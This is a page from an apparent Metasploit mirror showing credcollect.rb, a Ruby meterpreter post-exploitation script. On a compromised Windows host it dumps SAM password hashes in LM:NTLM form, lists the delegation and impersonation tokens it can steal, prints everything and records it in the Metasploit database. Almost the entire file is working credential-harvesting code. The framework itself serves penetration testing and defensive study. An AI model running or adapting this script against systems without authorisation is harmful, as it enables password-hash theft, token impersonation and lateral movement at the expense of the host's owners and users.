Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

credcollect.rb 2.3KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # credcollect - tebo[at]attackresearch.com
  7. opts = Rex::Parser::Arguments.new(
  8. "-h" => [ false,"Help menu." ],
  9. "-p" => [ true,"The SMB port used to associate credentials."]
  10. )
  11. smb_port = 445
  12. opts.parse(args) { |opt, idx, val|
  13. case opt
  14. when "-h"
  15. print_line("CredCollect -- harvest credentials found on the host and store them in the database")
  16. print_line("USAGE: run credcollect")
  17. print_line(opts.usage)
  18. raise Rex::Script::Completed
  19. when "-p" # This ought to read from the exploit's datastore.
  20. smb_port = val.to_i
  21. end
  22. }
  23. if client.platform == 'windows'
  24. # Collect even without a database to store them.
  25. db_ok = client.framework.db.active
  26. # Make sure we're rockin Priv and Incognito
  27. client.core.use("priv") if not client.respond_to?("priv")
  28. client.core.use("incognito") if not client.respond_to?("incognito")
  29. # It wasn't me mom! Stinko did it!
  30. hashes = client.priv.sam_hashes
  31. # Target infos for the db record
  32. addr = client.sock.peerhost
  33. # client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
  34. # Record hashes to the running db instance
  35. print_good "Collecting hashes..."
  36. hashes.each do |hash|
  37. data = {}
  38. data[:host] = addr
  39. data[:port] = smb_port
  40. data[:sname] = 'smb'
  41. data[:user] = hash.user_name
  42. data[:pass] = hash.lanman + ":" + hash.ntlm
  43. data[:type] = "smb_hash"
  44. data[:active] = true
  45. print_line " Extracted: #{data[:user]}:#{data[:pass]}"
  46. client.framework.db.report_auth_info(data) if db_ok
  47. end
  48. # Record user tokens
  49. tokens = client.incognito.incognito_list_tokens(0)
  50. raise Rex::Script::Completed if not tokens
  51. # Meh, tokens come to us as a formatted string
  52. print_good "Collecting tokens..."
  53. (tokens["delegation"] + tokens["impersonation"]).split("\n").each do |token|
  54. data = {}
  55. data[:host] = addr
  56. data[:type] = 'smb_token'
  57. data[:data] = token
  58. data[:update] = :unique_data
  59. print_line " #{data[:data]}"
  60. client.framework.db.report_note(data) if db_ok
  61. end
  62. raise Rex::Script::Completed
  63. else
  64. print_error("This version of Meterpreter is not supported with this Script!")
  65. raise Rex::Script::Completed
  66. end